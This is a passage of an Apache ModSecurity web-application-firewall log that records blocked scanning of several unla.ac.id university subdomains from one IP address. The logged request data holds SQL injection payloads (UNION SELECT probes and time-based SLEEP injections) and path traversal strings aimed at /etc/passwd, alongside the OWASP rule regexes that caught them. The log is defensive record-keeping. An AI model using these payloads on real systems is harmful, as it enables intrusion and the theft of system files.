"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAjtdBMAAAAX"]
[Tue Aug 29 11:48:43.405675 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAj12IgAAAAa"]
[Tue Aug 29 11:48:43.424996 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkAMJ0AAAAU"]
[Tue Aug 29 11:48:43.428254 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAjtdBQAAAAX"]
[Tue Aug 29 11:48:43.432990 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAlUlfMAAAA0"]
[Tue Aug 29 11:48:43.440595 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkxFycAAAAV"]
[Tue Aug 29 11:48:44.425647 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14rMCo-f0AAAlPmuAAAAAv"]
[Tue Aug 29 11:48:44.617545 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14rMCo-f0AAAhujCQAAAAr"]
[Tue Aug 29 11:48:47.350955 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAhujCoAAAAr"]
[Tue Aug 29 11:48:47.352302 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAkwQSoAAAAS"]
[Tue Aug 29 11:48:47.353180 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAl74tEAAAAj"]
[Tue Aug 29 11:48:47.387865 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAl8pP4AAAAm"]
[Tue Aug 29 11:48:47.482817 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAkyx-AAAAAW"]
[Tue Aug 29 11:48:48.357104 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14sMCo-f0AAAl74tIAAAAj"]
[Tue Aug 29 11:48:49.368906 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlIBZkAAAAn"]
[Tue Aug 29 11:48:49.371197 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAlo0zMAAAAJ"]
[Tue Aug 29 11:48:49.374962 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAmG@p4AAAAy"]
[Tue Aug 29 11:48:49.377656 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAku@l8AAAAQ"]
[Tue Aug 29 11:48:49.379066 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkoTlUAAAAH"]
[Tue Aug 29 11:48:49.379288 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAk1w8AAAAAY"]
[Tue Aug 29 11:48:49.385690 2023] [:error] [pid 2378] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlK-50AAAAp"]
[Tue Aug 29 11:48:49.398767 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAmG@p8AAAAy"]
[Tue Aug 29 11:48:49.416041 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlkwhoAAAAO"]
[Tue Aug 29 11:48:49.420792 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAlIBZoAAAAn"]
[Tue Aug 29 11:48:49.421254 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAk1w8EAAAAY"]
[Tue Aug 29 11:48:49.425305 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkwQS4AAAAS"]
[Tue Aug 29 11:48:49.425612 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlPmuwAAAAv"]
[Tue Aug 29 11:48:49.427790 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAl8pQEAAAAm"]
[Tue Aug 29 11:48:49.445425 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkoTlcAAAAH"]
[Tue Aug 29 11:48:50.361500 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ssCo-f0AAAkoTlgAAAAH"]
[Tue Aug 29 11:48:50.361684 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14ssCo-f0AAAkxFy0AAAAV"]
[Tue Aug 29 11:48:50.400017 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAkwQTAAAAAS"]
[Tue Aug 29 11:48:50.405452 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlPmu0AAAAv"]
